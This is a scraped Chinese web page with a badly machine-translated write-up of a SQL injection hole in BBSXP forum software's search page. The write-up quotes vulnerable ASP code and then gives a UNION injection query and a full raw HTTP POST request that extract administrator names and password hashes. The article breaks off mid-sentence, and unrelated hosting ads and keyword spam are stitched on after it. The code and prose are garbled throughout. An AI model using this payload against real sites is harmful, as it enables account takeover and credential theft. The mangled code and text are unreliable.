注入bbsxp注入漏洞(BBSXP injection vulnerability)

bbsxp  时间:2021-02-07  阅读:()

bbsxp注入漏洞BBSXP injection vulnerability

BBSXP injection vulnerability

BBSXP injection vulnerability

The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly

-- I found a summary of the bbsxp5 sp1 vulnerability

There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.

After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.

BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.

But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes

BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.

Obviously there are Numbers and strings in the query that must

not be used as input values. You can't input as a value, whydo you enter it?

That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp

(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >

The < %top

If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")

DetectPost

If the Request (" menu ") = "ok" then

Search = Request (" search ")

Forumid forumid = Request (" ")

TimeLimit = Request (" TimeLimit ")

The content = the HTMLEncode (Request (" content ") )

Searchxm= the HTMLEncode (Request (" searchxm "))

Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )

Searchxm2 = replace (searchxm2, "@", "&")

If the content = empty then the content = Request. Cookies ("u sername ")

If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"

If the search = "author" then

The item = "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"

SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""

"& TimeLimitList &" order by lasttime Desc"

Rs. The Open SQL, Conn, 1

. . . . . .

Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.

1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"

As long as the forumid input is empty, forumidor is empty.

2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "

TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",

Change to "and lasttime > getdate () -1" in MSSQL.

3. If the search = "author" then

The item= "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

As long as the search = "author",

If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,

As soon as we construct the input and pass the above statement,the SQL statement becomes:

Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'

And lasttime > now () - 1 order by lasttime Desc

There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.

Let' s look at the HTMLEncode function first

The function the HTMLEncode (fString)

FString = replace (fString, "; ", "& # 59;")

FString = server. The htmlencode (fString)

FString = replace (fString, "' ", "& # 39;")

FString = replace (fString, "-", "& # 45; & # 45;")

FString = replace (fString, "", " the & # 92; ")

FString = replace (fString, vbCrlf, "< br >")

The HTMLEncode = fString

End the function

The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.

There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,

It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit

It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and

The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use

Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,

Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from

[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword

= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.

And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.

The friend who knows the SQL statement will see it.

The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.

Here you can construct your own queries, and I give you areference.

Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,

I should also advise him to save energy and brain power.

(figure 1)

[2]

The construction is submitted as follows:

POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1

Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp

The Accept - Language: useful - cn

The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate

The user-agent: Mozilla / 4.

0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)

Host: localhost: 8000

The Content - Length: 481

Connection: Keep Alive

The cache-control: no - Cache

Cookie: eremite = 0; Userpass =

E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =

OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0

The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.

Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.

Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC

CB % % % CB D1 F7

I've written an HTML page for the searchxm part, which can be

DogYun27.5元/月香港/韩国/日本/美国云服务器,弹性云主机

DogYun怎么样?DogYun是一家2019年成立的国人主机商,称为狗云,提供VPS及独立服务器租用,其中VPS分为经典云和动态云(支持小时计费及随时可删除),DogYun云服务器基于Kernel-based Virtual Machine(Kvm)硬件的完全虚拟化架构,您可以在弹性云中,随时调整CPU,内存,硬盘,网络,IPv4路线(如果该数据中心接入了多条路线)等。DogYun弹性云服务器优...

ZJI:香港物理服务器,2*E5-2630L/32G/480G SSD/30Mbps/2IP/香港BGP,月付520元

zji怎么样?zji是一家老牌国人主机商家,公司开办在香港,这个平台主要销售独立服务器业务,和hostkvm是同一样,两个平台销售的产品类别不一平,商家的技术非常不错,机器非常稳定。昨天收到商家的优惠推送,目前针对香港邦联四型推出了65折优惠BGP线路服务器,性价比非常不错,有需要香港独立服务器的朋友可以入手,非常适合做站。zji优惠码:月付/年付优惠码:zji 物理服务器/VDS/虚拟主机空间订...

阿里云服务器绑定域名的几个流程整理

今天遇到一个网友,他之前一直在用阿里云虚拟主机,我们知道虚拟主机绑定域名是直接在面板上绑定的。这里由于他的网站项目流量比较大,虚拟主机是不够的,而且我看他虚拟主机已经有升级过。这里要说的是,用过阿里云虚拟主机的朋友可能会比较一下价格,实际上虚拟主机价格比云服务器还贵。所以,基于成本和性能的考虑,建议他选择云服务器。毕竟他的备案都接入在阿里云。这里在选择阿里云服务器后,他就蒙圈不知道如何绑定域名。这...

bbsxp为你推荐
渗透测试网站渗透测试怎么做?微信如何建群在微信里怎么创建一个群别人可以加入扫描二维码的加入pwPW考试是指什么办公协同软件免费的多人协同办公软件哪些,我了解的有钉钉、企业微信,其他的还有么?畅想中国淄博畅想中国消费怎么样lockdowndios8.1怎么激活内置卡贴发邮件怎么发怎样发邮件?服务器连接异常lol为什么总是提示服务器连接异常声母是什么什么是声母,什么是韵母网站排名靠前网站排名靠前是否就意味着运营成功?阐述原因
asp虚拟空间 中文域名查询 hawkhost 新世界电讯 好玩的桌面 主机合租 创梦 php空间推荐 cdn加速原理 中国电信宽带测速网 爱奇艺会员免费试用 789 万网空间 摩尔庄园注册 万网主机 rewritecond 石家庄服务器 机柜尺寸 ping值 easypanel 更多